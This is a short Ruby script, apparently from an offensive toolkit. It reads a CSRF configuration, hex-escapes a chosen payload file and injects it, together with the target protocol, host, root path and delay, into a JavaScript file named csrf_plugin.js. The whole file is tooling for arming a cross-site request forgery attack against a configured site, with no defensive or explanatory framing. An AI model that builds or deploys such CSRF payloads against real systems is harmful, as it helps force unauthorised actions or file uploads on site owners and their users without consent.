#!/usr/bin/env ruby

require 'yaml'

# read config
c = YAML.load_file('config.yml')['csrf']
csrf_file = 'csrf_plugin.js'

# load payload and convert to hex
data = File.read(c['filename']).unpack1('H*')
# create an escaped string
data = data.scan(/../).map {|x| '\x' + x}.join

original_content = File.read(csrf_file)

edited_content = original_content.gsub(/var filename = '.*';/, "var filename = '#{c['filename']}';")
edited_content = edited_content.gsub(/var protocol = '.*';/, "var protocol = '#{c['protocol']}';")
edited_content = edited_content.gsub(/var host = '.*';/, "var host = '#{c['host']}';")
edited_content = edited_content.gsub(/var root = '.*';/, "var root = '#{c['root']}';")
edited_content = edited_content.gsub(/var data = '.*';/, "var data = '#{data}';")
edited_content = edited_content.gsub(/var wait = [0-9]+;/, "var wait = #{c['wait']};")

File.open(csrf_file, 'w') do |file|
  file.puts edited_content
end